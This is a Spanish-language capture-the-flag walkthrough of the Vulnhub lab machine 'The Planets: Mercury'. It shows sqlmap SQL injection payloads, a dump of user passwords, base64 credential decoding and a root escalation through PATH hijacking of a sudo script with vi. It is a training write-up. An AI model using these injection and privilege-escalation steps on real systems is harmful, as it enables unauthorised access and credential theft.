[VULNHUB] The Planets:Mercury

Hoy vamos a hackear la maquina de Vulnhub llamada The Planets:Mercury. Podeis descargarla desde el siguiente enlace: https://www.vulnhub.com/entry/the-planets-mercury,544/
  • Video
  • Enumeration
  • Empezamos con un nmap para ver que puertos tiene abiertos.
    ~ > nmap -A -p- 192.168.1.116 Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-07 10:54 CEST Nmap scan report for 192.168.1.116 Host is up (0.00041s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) 8080/tcp open http-proxy WSGIServer/0.2 CPython/3.8.2 | fingerprint-strings: | FourOhFourRequest: | HTTP/1.1 404 Not Found | Date: Mon, 07 Sep 2020 08:54:27 GMT | Server: WSGIServer/0.2 CPython/3.8.2 | Content-Type: text/html | X-Frame-Options: DENY | Content-Length: 2366 | X-Content-Type-Options: nosniff | Referrer-Policy: same-origin | GetRequest, HTTPOptions: | HTTP/1.1 200 OK | Date: Mon, 07 Sep 2020 08:54:27 GMT | Server: WSGIServer/0.2 CPython/3.8.2 | Content-Type: text/html; charset=utf-8 | X-Frame-Options: DENY | Content-Length: 69 | X-Content-Type-Options: nosniff | Referrer-Policy: same-origin | Hello. This site is currently in development please check back later. | RTSPRequest: | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: WSGIServer/0.2 CPython/3.8.2 |_http-title: Site doesn't have a title (text/html; charset=utf-8). ----SNIP--- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 97.26 seconds
    Vemos que tiene abiertos el puerto de SSH y el puerot 8080. Al acceder a cualquier pagina por ejemplo: http://192.168.1.116:8080/a aparece el mensaje de error:
    Using the URLconf defined in mercury_proj.urls, Django tried these URL patterns, in this order: [name='index'] robots.txt [name='robots'] mercuryfacts/
    Si visitamos http://192.168.1.116:8080/mercuryfacts/ podemos ver una pagina con 2 enlaces. http://192.168.1.116:8080/mercuryfacts/todo contiene:
    Add CSS. Implement authentication (using users table) Use models in django instead of direct mysql call All the other stuff, so much!!!
    Tras mirar un poco la pagina, vemos que puede que sea vulnerable a alguna inyeccion sql asi que usamos sqlmap. Primero lanzamos el sqlmap a la url.
  • Exploitation
  • ~ > sqlmap --url http://192.168.1.116:8080/mercuryfacts/ ___ __H__ ___ ___[)]_____ ___ ___ {1.3.2#stable} |_ -| . [(] | .'| . | |___|_ [.]_|_|_|__,| _| |_|V... |_| http://sqlmap.org --- Parameter: #1* (URI) Type: error-based Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML) Payload: http://192.168.1.116:8080/mercuryfacts/(UPDATEXML(3651,CONCAT(0x2e,0x71766b7871, (SELECT (ELT(3651=3651,1))),0x7162626a71),2388)) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace Payload: http://192.168.1.116:8080/mercuryfacts/(CASE WHEN (9957=9957) THEN SLEEP(5) ELSE 9957 END) Type: UNION query Title: MySQL UNION query (random number) - 1 column Payload: http://192.168.1.116:8080/mercuryfacts/-2065 UNION ALL SELECT CONCAT(0x71766b7871,0x527a5167686d526971676b724d6a6a494c546754526c634479476f746e 626b6b55567754664d5953,0x7162626a71)# --- [15:16:19] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.1
    Vemos que ha encontrado un parametro vulnerable. Miramos las BBDD.
    ~ > sqlmap --url http://192.168.1.116:8080/mercuryfacts/ --dbs ___ __H__ ___ ___[)]_____ ___ ___ {1.3.2#stable} |_ -| . ["] | .'| . | |___|_ [(]_|_|_|__,| _| |_|V... |_| http://sqlmap.org --- [15:16:33] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.1 [15:16:33] [INFO] fetching database names [15:16:33] [INFO] used SQL query returns 2 entries [15:16:33] [INFO] resumed: 'information_schema' [15:16:33] [INFO] resumed: 'mercury' available databases [2]: [*] information_schema [*] mercury
    Vemos que hay 2 BBDD, miramos las tablas que contiene la BBDD mercury.
    ~ > sqlmap --url http://192.168.1.116:8080/mercuryfacts/ -D mercury --tables ___ __H__ ___ ___[.]_____ ___ ___ {1.3.2#stable} |_ -| . [.] | .'| . | |___|_ [)]_|_|_|__,| _| |_|V... |_| http://sqlmap.org --- [15:16:46] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.1 [15:16:46] [INFO] fetching tables for database: 'mercury' [15:16:46] [INFO] used SQL query returns 2 entries [15:16:46] [INFO] resumed: 'facts' [15:16:46] [INFO] resumed: 'users' Database: mercury [2 tables] +-------+ | facts | | users | +-------+
    De las 2 tablas, miramos el contenido de la tabla users.
    ~ > sqlmap --url http://192.168.1.116:8080/mercuryfacts/ -D mercury -T users --columns ___ __H__ ___ ___[(]_____ ___ ___ {1.3.2#stable} |_ -| . [(] | .'| . | |___|_ [']_|_|_|__,| _| |_|V... |_| http://sqlmap.org [15:16:59] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.1 [15:16:59] [INFO] fetching columns for table 'users' in database 'mercury' [15:16:59] [INFO] used SQL query returns 3 entries [15:16:59] [INFO] resumed: 'id','int' [15:16:59] [INFO] resumed: 'password','varchar(50)' [15:16:59] [INFO] resumed: 'username','varchar(50)' Database: mercury Table: users [3 columns] +----------+-------------+ | Column | Type | +----------+-------------+ | id | int | | password | varchar(50) | | username | varchar(50) | +----------+-------------+
    Por ultimo, hacemos dump de los username y passwords.
    ~ > sqlmap --url http://192.168.1.116:8080/mercuryfacts/ -D mercury -T users -C username,password --dump ___ __H__ ___ ___["]_____ ___ ___ {1.3.2#stable} |_ -| . ['] | .'| . | |___|_ [']_|_|_|__,| _| |_|V... |_| http://sqlmap.org Database: mercury Table: users [4 entries] +-----------+-------------------------------+ | username | password | +-----------+-------------------------------+ | john | johnny1987 | | laura | lovemykids111 | | sam | lovemybeer111 | | webmaster | mercuryisthesizeof0.056Earths | +-----------+-------------------------------+
  • Low Shell
  • Vemos que hay varios usuarios y passwords. Tras probar, nos logueamos con webmaster!
    ~ > ssh webmaster@192.168.1.116 ✘ INT 6s webmaster@192.168.1.116's password: Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-45-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Mon 7 Sep 10:26:44 UTC 2020 System load: 0.01 Usage of /: 71.7% of 4.86GB Memory usage: 29% Swap usage: 0% Processes: 101 Users logged in: 0 IPv4 address for enp0s3: 192.168.1.116 IPv6 address for enp0s3: 2a01:c50e:21e3:0:a00:27ff:fe89:4adc 22 updates can be installed immediately. 0 of these updates are security updates. To see these additional updates run: apt list --upgradable Last login: Tue Sep 1 13:57:14 2020 from 192.168.31.136 webmaster@mercury:~$
  • user_flag.txt
  • webmaster@mercury:~$ ls mercury_proj user_flag.txt webmaster@mercury:~$ cat user_flag.txt [user_flag_8339915c9a454657bd60ee58776f4ccd]
    Exploramos el sistema, y miramos que archivos tiene nuestro usuario.
    webmaster@mercury:~$ find / -user webmaster 2>/dev/null /home/webmaster/mercury_proj/mercury_facts/__pycache__/__init__.cpython-38.pyc /home/webmaster/mercury_proj/mercury_facts/__pycache__/views.cpython-38.pyc /home/webmaster/mercury_proj/mercury_facts/__pycache__/admin.cpython-38.pyc /home/webmaster/mercury_proj/mercury_facts/__pycache__/urls.cpython-38.pyc /home/webmaster/mercury_proj/notes.txt /home/webmaster/.bashrc /home/webmaster/.bash_logout /home/webmaster/user_flag.txt /home/webmaster/.selected_editor /home/webmaster/.profile /home/webmaster/.cache /home/webmaster/.cache/motd.legal-displayed /home/webmaster/.bash_history
    Vemos que hay un fichero llamado notes.txt que puede ser interesante. Lo miramos!
    webmaster@mercury:~$ cat /home/webmaster/mercury_proj/notes.txt Project accounts (both restricted): webmaster for web stuff - webmaster:bWVyY3VyeWlzdGhlc2l6ZW9mMC4wNTZFYXJ0aHMK linuxmaster for linux stuff - linuxmaster:bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==
    Parece que es base64, asi que hacemos el decode del usuario linuxmaster.
    webmaster@mercury:~$ echo "bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg==" | base64 -d mercurymeandiameteris4880km
    Ahora que tenemos la password de linuxmaster, nos logueamos como el.
    webmaster@mercury:~$ su linuxmaster Password: linuxmaster@mercury:/home/webmaster$
    Como linuxmaster, miramos si podemos usar sudo.
  • Privilege Escalation
  • linuxmaster@mercury:~$ sudo -l [sudo] password for linuxmaster: Matching Defaults entries for linuxmaster on mercury: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/ snap/bin User linuxmaster may run the following commands on mercury: (root : root) SETENV: /usr/bin/check_syslog.sh
    Vemos que podemos ejecutar como root un script, check_syslog.sh. No podemos editarlo y el contenido es:
    linuxmaster@mercury:~$ cat /usr/bin/check_syslog.sh #!/bin/bash tail -n 10 /var/log/syslog
    Ejecuta tail sin pasarle el path completo, asi que podriamos jugar con nuestro PATH para que ejecutara un "tail" falso, y asi obtener una shell con privilegios. Por ultimo, si nos fijamos, al hacer sudo -l nos aparece SETENV. Para que use nuestra variable $PATH y no la de root debemos pasarle el parametro --preserve-env=PATH, de ese modo todo deberia funcionar. Dicho esto, vamos a usar "vi" para escalar privilegios :)
    linuxmaster@mercury:~$ ln -s /bin/vi tail linuxmaster@mercury:~$ export PATH=.:$PATH
    Ejecutamos!
    linuxmaster@mercury:~$ sudo --preserve-env=PATH /usr/bin/check_syslog.sh
    Y se nos arranca vi :) En vi, ponemos:
    !/bin/bash
  • root_flag.txt
  • Ya con nuestra shell de root solo nos falta mirar la flag!
    root@mercury:~# cat root_flag.txt @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@/##////////@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@(((/(*(/((((((////////&@@@@@@@@@@@@@ @@@@@@@@@@@((#(#(###((##//(((/(/(((*((//@@@@@@@@@@ @@@@@@@@/#(((#((((((/(/,*/(((///////(/*/*/#@@@@@@@ @@@@@@*((####((///*//(///*(/*//((/(((//**/((&@@@@@ @@@@@/(/(((##/*((//(#(////(((((/(///(((((///(*@@@@ @@@@/(//((((#(((((*///*/(/(/(((/((////(/*/*(///@@@ @@@//**/(/(#(#(##((/(((((/(**//////////((//((*/#@@ @@@(//(/((((((#((((#*/((///((///((//////(/(/(*(/@@ @@@((//((((/((((#(/(/((/(/(((((#((((((/(/((/////@@ @@@(((/(((/##((#((/*///((/((/((##((/(/(/((((((/*@@ @@@(((/(##/#(((##((/((((((/(##(/##(#((/((((#((*%@@ @@@@(///(#(((((#(#(((((#(//((#((###((/(((((/(//@@@ @@@@@(/*/(##(/(###(((#((((/((####/((((///((((/@@@@ @@@@@@%//((((#############((((/((/(/(*/(((((@@@@@@ @@@@@@@@%#(((############(##((#((*//(/(*//@@@@@@@@ @@@@@@@@@@@/(#(####(###/((((((#(///((//(@@@@@@@@@@ @@@@@@@@@@@@@@@(((###((#(#(((/((///*@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@%#(#%@@@@@@@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Congratulations on completing Mercury!!! If you have any feedback please contact me at SirFlash@protonmail.com [root_flag_69426d9fda579afbffd9c2d47ca31d90]
  • End
  • Y con esto ya seriamos root de la maquina.